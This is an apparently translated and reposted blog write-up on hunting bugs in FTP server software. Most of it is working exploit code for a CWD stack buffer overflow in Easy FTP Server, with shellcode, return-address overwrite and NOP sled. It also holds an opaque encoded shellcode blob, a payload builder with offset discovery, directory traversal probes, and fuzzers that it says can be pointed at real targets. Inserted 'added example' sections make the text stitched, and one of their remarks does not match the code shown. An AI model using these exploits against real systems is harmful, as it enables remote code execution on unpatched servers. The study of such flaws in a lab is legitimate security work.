
FTP Vulnerability Hunting

2020-07-14 06:29, 1306 views

 

Introduction to the FTP protocol

Vulnerability hunting notes 1: DoS

  The idea is to replace FTP commands and their arguments with junk data, build malformed FTP commands and send them to the FTP server program under test.

I downloaded an FTPFuzz; the interface is hideous.

Start Quick 'n Easy FTP Server.

Once it was running, the test did not crash it, so no DoS could be triggered. Possibly related to SP3.

Vulnerability hunting notes 2: access permissions

Start CompleteFTP Server on Windows 7.

Could not log in, so create a new account.

The FTP directory is at "/Home/user" on the local system.

So is this a bypass, then?

easyFTP buffer overflow vulnerability

  When Easy FTP Server handles CWD it does not check the length of the argument; passing an overlong argument overflows the buffer and overwrites the saved return address, which is what the exploit below relies on.

Start easyFTP; on first run it generates three XML configuration files and a folder.

Attach with OllyDbg (OD) and press F9 to let it run.

The experiment failed:

The code was as follows:

import socket
import sys


def ftp_test(ip, port):
    target = ip
    # Shellcode as given on the page: a GetPC/XOR decoder stub (key 0x11, stops
    # at the first 0x90) followed by the encoded payload, 198 bytes in total.
    # Note that the encoded bytes include 0x0d, which an FTP line parser may
    # treat as the end of the command.
    shellcode = (b'\x50\x20'
                 b'\xD9\xEE'
                 b'\xD9\x74\x24\xF4'
                 b'\x58'
                 b'\x83\xC0\x1b'
                 b'\x33\xC9'
                 b'\x8A\x1C\x08'
                 b'\x80\xF3\x11'
                 b'\x88\x1C\x08'
                 b'\x41'
                 b'\x80\xFB\x90'
                 b'\x75\xF1'
                 b'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
                 b'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
                 b'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
                 b'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
                 b'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
                 b'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
                 b'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
                 b'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
                 b'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
                 b'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
                 b'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')
    # Layout: shellcode first, 'a' padding up to the saved return address at
    # offset 268, then the 4-byte overwrite value (little-endian 0x7d5f6fa0)
    buffer = shellcode + b'a' * (268 - 198) + b'\xa0\x6f\x5f\x7d'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target, port))
        print("[+] Connected!")
    except socket.error:
        print("[!] Connection failed!")
        sys.exit(0)
    s.recv(1024)                          # banner
    s.send(b'USER anonymouss\r\n')        # username as in the original attempt
    s.recv(1024)
    s.send(b'PASS anonymous\r\n')
    s.recv(1024)
    print("[+] Sending buffer...")
    # No space between CWD and the argument: the server never parses this as a
    # CWD command, which is why this attempt failed (see below)
    s.send(b'CWD' + buffer + b'\r\n')
    try:
        s.recv(1024)
        print("failed")
    except socket.error:
        print("ok")
    s.close()


if __name__ == '__main__':
    ftp_test("192.168.211.129", 21)

I searched online for other people's code; theirs uses the pwntools package, which I could not install on Windows. I laughed. Heh. Here is their exploit code:

from pwn import *

p = remote("192.168.253.156", 21)
jmp_esp = 0x7E429353   # jmp esp in user32.dll on the author's XP SP3 build
# Pops MessageBoxA(0, "giantbranch!", "giantbranch!", 0) by calling the
# hard-coded address 0x7E4507EA, so it is tied to the same XP build
shellcode = b"\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
nop = b"\x90" * 12
# 268 bytes of padding reach the saved return address; jmp esp then lands in
# the NOP sled and slides into the shellcode
payload = b'a' * 268 + p32(jmp_esp) + nop + shellcode
print(p.recv(1024))
p.sendline(b"USER anonymous")
print(p.recv(1024))
p.sendline(b"PASS anonymous")
print(p.recv(1024))
p.sendline(b"CWD " + payload)   # note the space after CWD
p.interactive()

 Continued with the experiment: success. Tracking down the cause: my code was missing one space (between CWD and the argument). So a reminder to everyone: pay attention to details.

After the CWD command the overflow happens; go straight to the CWD handler and search for ws2_32.recv in OllyDbg, but how to find it? With IDA (which I don't know how to use; feels like I need to catch up again). I ask people every day; today I'll just get the attack code written.

Pausing here.

 

 Here it is changed to jmp esp.

It does not work on the Chinese-language version of XP (the hard-coded user32 addresses differ between builds).

The final code:

import socket
import struct
import sys
import time


def ftp_test(ip, port):
    target = ip
    jmp_esp = 0x7E429353   # jmp esp in user32.dll, XP SP3; differs on the Chinese XP
    # MessageBoxA("giantbranch!") via the hard-coded 0x7E4507EA, same XP build
    shellcode = b"\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
    nop = b"\x90" * 12
    # 268 bytes of padding, the jmp esp address packed little-endian, a NOP
    # sled and then the shellcode
    buffer = b'a' * 268 + struct.pack('<I', jmp_esp) + nop + shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target, port))
        print("[+] Connected!")
    except socket.error:
        print("[!] Connection failed!")
        sys.exit(0)
    time.sleep(1)                         # let the banner arrive
    s.send(b'USER anonymous\r\n')
    s.recv(1024)
    s.send(b'PASS anonymous\r\n')
    s.recv(1024)
    print("[+] Sending buffer...")
    s.send(b'CWD ' + buffer + b'\r\n')    # the space after CWD is essential
    try:
        h = s.recv(1024)                  # an empty reply also means the server is gone
        print(h)
        print("failed")
    except socket.error:
        print("ok")
    s.close()


if __name__ == '__main__':
    ftp_test("192.168.211.129", 21)
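How the 268-byte offset used in the payload above is found, and how the final payload is laid out and checked before it is sent, as an added example written for this page (not the original author's code). It reuses the page's jmp esp address 0x7E429353 and the MessageBox shellcode from the final script; the EIP value 0x6A413969 is constructed, being what the debugger would show if a cyclic pattern were sent to a server whose saved return address sits 268 bytes into the argument.

```python
"""Offset discovery and payload layout for a CWD stack overflow (added example)."""
import string
import struct

# Bytes an FTP command line cannot carry: CR/LF end the command and a NUL
# would cut a C string copy short inside the server.
BAD_CHARS = {0x00, 0x0A, 0x0D}

# Shellcode from the page's final script (MessageBoxA on the author's XP SP3).
SHELLCODE = (b"\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69"
             b"\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0")


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 4-byte window is
    unique for up to 20280 bytes, so the value that lands in EIP after the
    crash tells you where the saved return address sits in the argument."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(pattern, eip):
    """eip: the 32-bit value the debugger shows after the crash (int) or the
    raw 4 bytes. Returns the offset of the saved return address."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else eip
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("EIP value not found in pattern: %r" % needle)
    return offset


def check_bad_chars(data):
    """Sorted list of forbidden byte values present in data (empty if clean)."""
    return sorted({b for b in data if b in BAD_CHARS})


def build_payload(offset, jmp_esp, shellcode, nop_count=12):
    """'a' * offset | jmp esp address (little-endian) | NOP sled | shellcode.
    Refuses to build a payload whose address or shellcode contains bad chars."""
    ret = struct.pack("<I", jmp_esp)
    for name, part in (("return address", ret), ("shellcode", shellcode)):
        bad = check_bad_chars(part)
        if bad:
            raise ValueError("%s contains bad chars %s" % (name, bad))
    return b"a" * offset + ret + b"\x90" * nop_count + shellcode


def layout(payload, offset):
    """Decode a payload back into (return address, sled length, shellcode)
    so the layout can be verified before anything is sent."""
    ret = struct.unpack("<I", payload[offset:offset + 4])[0]
    rest = payload[offset + 4:]
    sled = len(rest) - len(rest.lstrip(b"\x90"))
    return ret, sled, rest[sled:]


if __name__ == "__main__":
    # Step 1: crash the server with a pattern instead of 'a' * N and read EIP.
    # Constructed value: what EIP holds when the return address is at offset 268.
    pattern = pattern_create(300)
    eip_seen = 0x6A413969
    off = pattern_offset(pattern, eip_seen)
    print("offset =", off)
    # Step 2: build the real payload at that offset and check its layout.
    payload = build_payload(off, 0x7E429353, SHELLCODE)
    print(layout(payload, off))
```

The mismatch the page itself shows, a hand-typed little-endian address that does not match the `jmp_esp` value next to it, is exactly what `build_payload` and `layout` are there to catch: pack the address with `struct`, then decode the payload and compare before sending.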

 

Fuzz DIY

# -*- coding: utf-8 -*-
# @Date    : 2017-02-19 21:44:12
# @Author  : giantbranch (giantbranch@gmail.com)
# @Link    : http://blog.csdn.net/u012763794?viewmode=contents
# @Link    : http://www.giantbranch.cn/
import socket
import sys

buffer = b'a' * 4
# commands whose argument is fuzzed in mode 1
fuzzcmd = [b'mdelete', b'cd', b'mkdir', b'delete', b'cwd', b'mdir', b'mput', b'mls', b'rename', b'site index']

if len(sys.argv) != 4:
    print("[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1")
    sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
mode = int(sys.argv[3])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print(target)
    print(port)
    s.connect((target, port))
    print("[*] Connected!")
except socket.error:
    print("[*] Connect failed!")
    sys.exit(0)

# receive the welcome banner, then log in anonymously
s.recv(1024)
s.send(b"USER anonymous\r\n")
s.recv(1024)
s.send(b"PASS anonymous\r\n")
s.recv(1024)

j = 100
if mode == 1:
    # mode 1: overlong and double arguments for every command, all on one
    # connection; a failed recv at the end is taken as a sign of a crash
    print("[*] Sending payload...")
    for i in fuzzcmd:
        s.send(i + b' ' + buffer * j + b'\r\n')          # 400 bytes
        s.send(i + b' ' + buffer * j * 4 + b'\r\n')      # 1600 bytes
        s.send(i + b' ' + buffer * j * 8 + b'\r\n')      # 3200 bytes
        s.send(i + b' ' + buffer * j * 40 + b'\r\n')     # 16000 bytes
        s.send(i + b' ' + buffer + b' ' + buffer + b'\r\n')
    try:
        s.recv(1024)
        print("[!] WuWu, Failed!")
    except socket.error:
        print("[+] Yeah! Maybe you find a Bug!")
if mode == 2:
    # mode 2: directory traversal probes; a 550 reply means the server
    # refused, so the absence of a 550 is what hints at traversal
    s.send(b'cd ../\r\n')
    ds = s.recv(50).find(b"550")
    if ds == -1:
        print("[+] Yeah! Maybe you can cd ../!")
    s.send(b'cd ..\\\r\n')          # backslash variant, properly escaped
    dss = s.recv(50).find(b"550")
    if dss == -1:
        print("[+] Yeah! Maybe you can cd ..\\!")
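The fuzzing principle stated in notes 1 (replace command arguments with junk and watch the server) and the DIY script above both send every case down one connection and judge success only by whether the last recv fails, which cannot tell which command, or which length, broke the server; the script also repeats the CWD-without-a-space mistake if a verb and its argument are ever concatenated. The following is an added example (not the page's or giantbranch's code) that opens a fresh session per test case, scans and then bisects to the smallest argument length that gets no reply, and runs against an in-process mock server so it works offline. The mock's behaviour is invented for the example: it "crashes" (drops the connection without replying) when a CWD argument exceeds 268 bytes, refuses any argument containing ".." with 550, accepts MKD/DELE/RNFR safely, and, like a real server, splits the line at the first space, so "CWD" glued to its argument comes back as 500 and never reaches the CWD handler.

```python
"""Per-case FTP argument fuzzer with an in-process mock target (added example)."""
import socket
import threading

CRASH_LIMIT = 268   # constructed: the mock drops the connection past this length


class MockFtpServer(threading.Thread):
    """Minimal FTP-like server whose only purpose is to be fuzzed offline.
    A real server would die on the overflow; here only the connection drops,
    which is the same signal the client sees, and lets the run continue."""

    def __init__(self):
        super().__init__(daemon=True)
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(8)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            conn, _ = self.sock.accept()
            with conn:
                self.serve(conn)

    def serve(self, conn):
        conn.sendall(b"220 mock ftp ready\r\n")
        for raw in conn.makefile("rb"):
            # Real servers split verb and argument at the first space, so
            # b"CWD" + payload with no space is an unknown verb, not a CWD.
            verb, _, arg = raw.rstrip(b"\r\n").partition(b" ")
            verb = verb.upper()
            if verb in (b"USER", b"PASS"):
                conn.sendall(b"230 ok\r\n")          # login simplified
            elif verb in (b"CWD", b"CD"):
                if len(arg) > CRASH_LIMIT:
                    return    # "crash": connection closes with no reply
                conn.sendall(b"550 denied\r\n" if b".." in arg else b"250 ok\r\n")
            elif verb in (b"MKD", b"DELE", b"RNFR"):
                conn.sendall(b"250 ok\r\n")          # handled safely
            else:
                conn.sendall(b"500 unknown command\r\n")


def start_mock():
    srv = MockFtpServer()
    srv.start()
    return srv


def ftp_exchange(host, port, lines, timeout=3.0):
    """Fresh session per call: banner, anonymous login, then `lines`.
    Returns the reply to the last line, or b"" if the server went silent or
    closed the connection (the crash signal)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)
        reply = b""
        for cmd in (b"USER anonymous", b"PASS anonymous", *lines):
            s.sendall(cmd + b"\r\n")
            try:
                reply = s.recv(1024)
            except (socket.timeout, ConnectionError):
                return b""
            if not reply:
                return b""
        return reply


def probe(host, port, verb, length):
    """One test case: verb, a space, and `length` filler bytes."""
    return ftp_exchange(host, port, [verb + b" " + b"A" * length])


def find_crash_length(host, port, verb, steps=(100, 400, 800, 4000)):
    """Scan increasing lengths, each on its own connection. On the first one
    that gets no reply, bisect between the last good and the bad length and
    return the smallest crashing length; None if the verb never crashes."""
    lo = 0
    for hi in steps:
        if probe(host, port, verb, hi) != b"":
            lo = hi
            continue
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if probe(host, port, verb, mid) == b"":
                hi = mid
            else:
                lo = mid
        return hi
    return None


def fuzz(host, port, verbs=(b"CWD", b"MKD", b"DELE", b"RNFR")):
    """Map each verb to its smallest crashing argument length (or None)."""
    return {v: find_crash_length(host, port, v) for v in verbs}


if __name__ == "__main__":
    srv = start_mock()
    print(fuzz("127.0.0.1", srv.port))
    # The page's first attempt reproduced: no space after CWD, so 500, no crash
    print(ftp_exchange("127.0.0.1", srv.port, [b"CWD" + b"A" * 300]))
    print(ftp_exchange("127.0.0.1", srv.port, [b"CWD ../"]))   # 550: refused
```

Against a real target, point `fuzz` at the server's host and port instead of the mock; the smallest crashing length it returns is the number to feed into a cyclic pattern run to pin down the exact return-address offset.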

After it finished running, the server was extremely sluggish.

Not successful.

 

Reposted from: https://www.cnblogs.com/Ccmr/p/7340496.html
